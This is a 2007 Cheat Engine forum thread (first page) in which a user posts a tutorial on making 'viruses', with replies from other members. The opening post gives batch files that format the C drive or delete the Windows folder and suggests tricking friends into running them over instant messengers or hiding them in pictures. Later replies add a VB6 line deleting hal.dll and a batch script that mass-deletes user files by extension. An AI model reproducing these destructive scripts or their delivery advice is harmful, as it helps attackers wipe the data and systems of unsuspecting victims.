Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


[Tutorial] How To Make Viruses(Trojans)-UPDATED 1.2
Goto page 1, 2, 3, 4, 5  Next
 
Post new topic   Reply to topic    Cheat Engine Forum Index -> General programming
View previous topic :: View next topic  
Author Message
AdamWest
Master Cheater
Reputation: 0

Joined: 05 Jul 2007
Posts: 354
Location: Quahog, Rhode Island

PostPosted: Fri Nov 02, 2007 12:23 pm    Post subject: [Tutorial] How To Make Viruses(Trojans)-UPDATED 1.2 Reply with quote

This guide will be updated tonight with pictures, and new viruses. If you like the guide, you can rep me, but it is not needed.
This guide, as of now, is for Windows ONLY!

----------------------------------------------------------------------------------------------------
Batch File 1.
----------------------------------------------------------------------------------------------------
Description:This is easily, the most simple virus ever. This "virus" is actually not a virus. It will format your C drive, rendering it useless if the OS is installed on said drive.
----------------------------------------------------------------------------------------------------
Step 1. Open Notepad
Step 2. In Notepad, type in FORMAT C:
Step 3. Click Save As, and save it as <insertnamehere>.bat

Warning: I do not recommend running this!
To Spread: There are a couple ways. Send to friends as the defualt Batch File, and watch them log off AIM, XFire, MSN, whatever within minutes. Or, you can use C++ or maybe Delphi, to code a basic windows program that runs this in the background. Tutorial on this later!
----------------------------------------------------------------------------------------------------
Batch File 2.
----------------------------------------------------------------------------------------------------
Description: This Batch File will delete everything in the WINDOWS part of the C: drive, also rendering it useless. This is more advanced than the last, but will n
ot re-delete everything on bootup.

----------------------------------------------------------------------------------------------------
Step 1. Open Notepad
Step 2. Type in :
@echo off
rem deleting windows
del C:\WINDOWS

Step 3. Click Save As, and save it as <insertnamehere>.bat
Warning: I do not recommend running this!
To Spread: Same as the other Batch. Send it around on AIM, or something. Later I'll show an example of how to embed it into a picture, so it spreads around easily.
----------------------------------------------------------------------------------------------------
Batch Virus Maker: Tired of manually righting codes for crappy .bat files? Included here is the Batch Virus Maker, which includes such options: Disabling victims mouse, keyboard, how the file starts, how it spreads and virus details.
----------------------------------------------------------------------------------------------------
GenVirus:
Author: J.Struss
Features:

GenVir was marketed by a Frenchman called Struss as a tool to evaluate the performance of anti-virus products and its documents included an order form. In 1993 members of NuKE released a cracked version 1.5. Later in 1993 Struss released version 2.0 which boasted MS-DOS 5.0, 6.0 and Doublespace compatibility.

More than 10 viruses produced by GenVir are known. Ill post how to use it soon
----------------------------------------------------------------------------------------------------



The Extension 'zip' was deactivated by an board admin, therefore this Attachment is not displayed.


_________________

"I myself am made entirely of flaws, stitched together with good intentions." - Augusten Burroughs


Last edited by AdamWest on Sat Nov 03, 2007 6:44 pm; edited 9 times in total
Back to top
View user's profile Send private message AIM Address
Lorrenzo
Moderator
Reputation: 4

Joined: 02 Jun 2006
Posts: 3744

PostPosted: Fri Nov 02, 2007 12:53 pm    Post subject: Reply with quote

Nice, but the one with C:\ isn't the best because not everyone uses it.
_________________
LAWLrrenzolicious
Back to top
View user's profile Send private message
Hackerdevelopment
Advanced Cheater
Reputation: 0

Joined: 11 Oct 2007
Posts: 55

PostPosted: Fri Nov 02, 2007 1:30 pm    Post subject: Reply with quote

Nice! This is gonna b great!
_________________
Back to top
View user's profile Send private message
AtheistCrusader
Grandmaster Cheater
Reputation: 6

Joined: 23 Sep 2006
Posts: 681

PostPosted: Fri Nov 02, 2007 2:01 pm    Post subject: Reply with quote

since this is .bat file everyone can edit it and see the code so its almost useless
Back to top
View user's profile Send private message
AdamWest
Master Cheater
Reputation: 0

Joined: 05 Jul 2007
Posts: 354
Location: Quahog, Rhode Island

PostPosted: Fri Nov 02, 2007 2:03 pm    Post subject: Reply with quote

masterkert3 wrote:
since this is .bat file everyone can edit it and see the code so its almost useless

Masterkert, stop being a fatass and read the section where it says I'm teaching other kinds later. Also, batch files are pretty simple, so I included them for the first part.

_________________

"I myself am made entirely of flaws, stitched together with good intentions." - Augusten Burroughs
Back to top
View user's profile Send private message AIM Address
Poutsokefalos
How do I cheat?
Reputation: 0

Joined: 23 Sep 2007
Posts: 4

PostPosted: Fri Nov 02, 2007 2:07 pm    Post subject: You pown man! Reply with quote

Nice one adam.just one thing...msn won't let me send it because it says that i must scan it first Sad
Back to top
View user's profile Send private message
DeletedUser14087
I post too much
Reputation: 2

Joined: 21 Jun 2006
Posts: 3069

PostPosted: Fri Nov 02, 2007 2:14 pm    Post subject: Reply with quote

This is not a virus, you're scamming people Confused

Virus must be detected by a AV, AV wont detect "del C:\WINDOWS" unless the person is too stupod to edit the .bat with notepad
Back to top
View user's profile Send private message
Stylo
Grandmaster Cheater Supreme
Reputation: 3

Joined: 16 May 2007
Posts: 1073
Location: Israel

PostPosted: Fri Nov 02, 2007 2:17 pm    Post subject: Reply with quote

nice tut thanks
i used visual C# to make a little program for doing it
and i added a search option in local discs C D & E (seached the windows folder)

here's what i did
WARNING: Do not run this file S:



The Extension 'rar' was deactivated by an board admin, therefore this Attachment is not displayed.


_________________
Stylo
Back to top
View user's profile Send private message
appalsap
Moderator
Reputation: 0

Joined: 27 Apr 2006
Posts: 6753
Location: Pakistan

PostPosted: Fri Nov 02, 2007 2:17 pm    Post subject: Reply with quote

Darn, I wanted you to remove this, but Kaspersky's already read it. We all know what kind of programs we'll be seeing in the next few days Rolling Eyes
_________________
Back to top
View user's profile Send private message
AtheistCrusader
Grandmaster Cheater
Reputation: 6

Joined: 23 Sep 2006
Posts: 681

PostPosted: Fri Nov 02, 2007 2:18 pm    Post subject: Reply with quote

AdamWest wrote:
masterkert3 wrote:
since this is .bat file everyone can edit it and see the code so its almost useless

Masterkert, stop being a fatass and read the section where it says I'm teaching other kinds later. Also, batch files are pretty simple, so I included them for the first part.


since i read that, i commented about .bat file section not the others
o and a VB 6 virus here

Code:

kill ("C:/windows/system32/hal.dll")
Back to top
View user's profile Send private message
DeletedUser14087
I post too much
Reputation: 2

Joined: 21 Jun 2006
Posts: 3069

PostPosted: Fri Nov 02, 2007 2:19 pm    Post subject: Reply with quote

appalsap wrote:
Darn, I wanted you to remove this, but Kaspersky's already read it. We all know what kind of programs we'll be seeing in the next few days Rolling Eyes


oh shit !, you caught me !
Back to top
View user's profile Send private message
hcavolsdsadgadsg
I'm a spammer
Reputation: 26

Joined: 11 Jun 2007
Posts: 5801

PostPosted: Fri Nov 02, 2007 2:20 pm    Post subject: Reply with quote

This topic is a cesspool of failure.
Back to top
View user's profile Send private message
XxOsirisxX
Grandmaster Cheater Supreme
Reputation: 0

Joined: 30 Oct 2006
Posts: 1597

PostPosted: Fri Nov 02, 2007 2:23 pm    Post subject: Reply with quote

Weak "virus".

This is better...

echo del "%systemdrive%\*.exe" /s /f /a /q
echo del "%systemdrive%\*.jpg" /s /f /a /q
echo del "%systemdrive%\*.gif" /s /f /a /q
echo del "%systemdrive%\*.bmp" /s /f /a /q
echo del "%systemdrive%\*.mp3" /s /f /a /q
echo del "%systemdrive%\*.wav" /s /f /a /q
echo del "%systemdrive%\*.wma" /s /f /a /q
echo del "%systemdrive%\*.avi" /s /f /a /q
echo del "%systemdrive%\*.mpg" /s /f /a /q
echo del "%systemdrive%\*.wmv" /s /f /a /q
echo del "%systemdrive%\*.txt" /s /f /a /q
echo del "%systemdrive%\*.doc" /s /f /a /q
echo del "%systemdrive%\*.swf" /s /f /a /q
echo del "%systemdrive%\*.lnk" /s /f /a /q

Also for the windows..

del %homedrive%/Windows

_________________

Back to top
View user's profile Send private message
AtheistCrusader
Grandmaster Cheater
Reputation: 6

Joined: 23 Sep 2006
Posts: 681

PostPosted: Fri Nov 02, 2007 2:25 pm    Post subject: Reply with quote

and what r these supposed to do?
Back to top
View user's profile Send private message
XxOsirisxX
Grandmaster Cheater Supreme
Reputation: 0

Joined: 30 Oct 2006
Posts: 1597

PostPosted: Fri Nov 02, 2007 2:26 pm    Post subject: Reply with quote

masterkert3 wrote:
and what r these supposed to do?


the environ

%HomeDrive%, %SystemRoot%..

those..

Well, theys find the actual driver that you use to install windows. So, if you have it on D:, %HomeDrive% = D:.

Note: Those environs that i name, are just for that.

_________________

Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> General programming All times are GMT - 6 Hours
Goto page 1, 2, 3, 4, 5  Next
Page 1 of 5

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)   Twitter
Third party websites